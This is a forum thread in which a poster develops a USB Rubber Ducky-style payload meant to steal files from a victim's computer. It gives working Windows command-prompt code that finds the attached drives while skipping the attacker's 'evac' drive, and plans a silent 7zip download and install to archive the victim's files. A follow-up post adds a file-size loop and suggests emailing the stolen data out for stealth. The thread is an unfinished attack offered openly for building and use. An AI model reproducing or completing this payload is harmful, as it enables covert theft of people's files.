Jump to content

[Payload] Starting work on a Duckey USB theft payload


overwraith
 Share

Recommended Posts

I am starting work on a Duckey USB file theft payload. The following codes will execute directly in the command prompt, and iterate through the possible drive letters, and ignore your "evac drive" (evac==evacuation) which will have a text file on the root evac.txt. The idea is to download 7zip, install it silently, then run the commands that will search out attached USB drives, and archive the files to your USB drive. The following is the code that will find the drives, and save them to a variable so we can send their locations to the 7zip application as arguments.

REM SET THE FLAG FOR ENABLE DELAYED ENVIRONMENT VARIABLE EXPANSION

REM FROM WHAT I UNDERSTAND THERE ARE INDIRECTION PROBLEMS WHEN NOT

REM SET AND THE VARIABLE IS CALLED MULTIPLE TIMES ON THE SAME LINE

cmd.exe /V:ON

REM IF SOME TEXT IS NOT ASSIGNED TO THIS VARIABLE THE LOOP WILL FAIL AND

REM CAUSE THE VARIABLE NAME TO BE ASSIGNED TO THE BEGINNING OF THE LIST

Set targetDr=*

REM THE FOR LOOP THAT SEEKS OUT SUITABLE DRIVES, HAS SOME NIFTY INDIRECTION

REM OPERATORS "!" WHICH ARE USED WHEN THE VARIABLE IS CALLED MULTIPLE

REM TIMES IN THE SAME LINE SO IT CAN TAKE ADVANTAGE OF THE ENABLED DELAYED

REM EXPANSION WE SET EARLIER

for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( IF NOT EXIST %a:\evac.txt If EXIST %a:\ SET targetDr=!targetDr! %a: )

REM REMOVE THE SINGLE CHARACTER OF TEXT WE ASSIGNED TO THE

REM LIST VARIABLE EARLIER

Set targetDr=%targetDr:~1%

REM SHOW ME THE OUTPUT

echo %targetDr%

The next great hurdle in this payload will be figuring out a way to determine the size of the attached drives, so we can tell whether or not it is a flash drive by its disk size. We don't want to end up trying to copy a hard drive to a flash drive that's not big enough.

If the "stealthyness" of this attack becomes a problem later, we can rely on something from the switchblade project to email the data to us.

Link to comment
Share on other sites

Started working on getting the used space on a drive, and I tried to make a "for" loop to do that too, and got some weird output. So for our resident bug hunters, does this look like a variable overflow situation?

cmd.exe /V:ON

Set /A usedSpace=0

for /R %i in (*) do Set /A usedSpace+=%~zi

Yields>

C:\>Set /A usedSpace+=8635

-1933490268

C:\>Set /A usedSpace+=5379

-1933484889

C:\>Set /A usedSpace+=22368

-1933462521

C:\>Set /A usedSpace+=2048

-1933460473

C:\>Set /A usedSpace+=844

-1933459629

C:\>Set /A usedSpace+=4726

-1933454903

C:\>Set /A usedSpace+=5182

-1933449721

C:\>Set /A usedSpace+=153298

-1933296423

C:\>Set /A usedSpace+=31

-1933296392

C:\>Set /A usedSpace+=1142784

-1932153608

C:\>Set /A usedSpace+=1630208

-1930523400

C:\>Set /A usedSpace+=540672

-1929982728

C:\>

Link to comment
Share on other sites

  • 1 month later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...